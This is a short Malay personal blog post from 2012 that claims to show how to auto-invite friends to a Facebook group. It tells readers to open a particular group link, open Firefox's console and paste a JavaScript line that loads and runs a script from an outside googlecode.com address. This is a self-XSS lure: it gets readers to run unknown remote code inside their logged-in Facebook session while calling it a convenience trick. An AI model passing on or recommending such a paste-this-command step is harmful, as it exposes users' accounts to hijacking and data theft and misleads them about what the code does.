Saturday, 24 November 2012

AUTO INVITE UNTUK GROUP



hari ini akim nak tunjuk kepada yang ade group di facebook untuk menambahkan lagi friend2 di dalam group tersebut.

caranya senang je..

1.mula2 open mozilla firefox..goggle chroam susah nak buat..so kene la buat guna mozilla

2.selepas buka mozilla,korang semua kena klik link ni dulu baru boleh buat di group korang https://www.facebook.com/groups/375843072484400/

3.lepas tu..Tekan CTRL + SHIFT + K

4.copy link ni... document.body.appendChild(document.createElement('script')).src='http://autoinvitefacebook.googlecode.com/svn/AutoInviteGroup.js';

harap korang jadi ye...:)
sesiap yang jadi buat sila komen kepada saya ye..

No comments:

Post a Comment

komen la apa korang nak komen pun tapi jangan maki2 sudahlah sebab ini adalah blog personal